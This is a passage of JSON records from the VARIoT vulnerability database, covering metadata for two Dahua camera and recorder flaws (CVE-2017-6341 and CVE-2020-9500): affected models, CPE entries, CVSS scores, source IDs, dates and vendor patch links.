},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"db": "VULHUB",
"id": "VHN-114544"
},
{
"db": "VULMON",
"id": "CVE-2017-6341"
},
{
"db": "BID",
"id": "96456"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"date": "2017-02-27T00:00:00",
"db": "VULHUB",
"id": "VHN-114544"
},
{
"date": "2017-02-27T00:00:00",
"db": "VULMON",
"id": "CVE-2017-6341"
},
{
"date": "2017-02-27T00:00:00",
"db": "BID",
"id": "96456"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"date": "2017-02-27T07:59:00.380000",
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"date": "2017-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02589"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-114544"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2017-6341"
},
{
"date": "2017-03-07T01:08:00",
"db": "BID",
"id": "96456"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-002228"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2017-6341"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DHI-HCVR7216A-S3 Vulnerabilities that capture important information on devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-002228"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-920"
}
],
"trust": 0.6
}
}
VAR-202004-1824
Vulnerability from variot - Updated: 2023-12-18 13:28Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down. Dahua There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera.
There are security holes in many Dahua products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1824",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hx7842h",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n42b3p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd1a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n42b2p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52b3p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52b2p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52a4p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd50",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n52b5p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hx5842h",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n42b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd5a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd6al",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n54a4p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hxxx5x4x",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ptz1a",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "sd52c",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "n54b2p",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hx2xxx",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2019-12"
},
{
"model": "ipc-hx2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx5842h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hx7842h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hxxx5x4x",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ptz1a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd1a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd50",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd52c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd5a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd6al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "sd 6al series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "sd 5a series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "sd 1a series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "sd 50/52c series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "nvr n5x series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "nvr n4x series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "ipc n4 series",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "NVD",
"id": "CVE-2020-9500"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2019-12",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9500"
}
]
},
"cve": "CVE-2020-9500",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-003799",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.4,
"id": "CNVD-2020-22980",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:M/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-003799",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-9500",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2020-003799",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-22980",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-554",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down. Dahua There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera. \n\r\n\r\nThere are security holes in many Dahua products",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "CNVD",
"id": "CNVD-2020-22980"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-9500",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-22980",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-554",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"id": "VAR-202004-1824",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
}
]
},
"last_update_date": "2023-12-18T13:28:09.084000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DHCC-SA-202004-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
},
{
"title": "Patch for Multiple Dahua product input verification error vulnerabilities (CNVD-2020-22980)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/213933"
},
{
"title": "Multiple Dahua Product input verification error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=115747"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "NVD",
"id": "CVE-2020-9500"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/727"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9500"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9500"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"date": "2020-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"date": "2020-04-09T14:15:13.260000",
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"date": "2020-04-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22980"
},
{
"date": "2020-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003799"
},
{
"date": "2021-07-21T11:39:23.747000",
"db": "NVD",
"id": "CVE-2020-9500"
},
{
"date": "2020-05-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-554"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
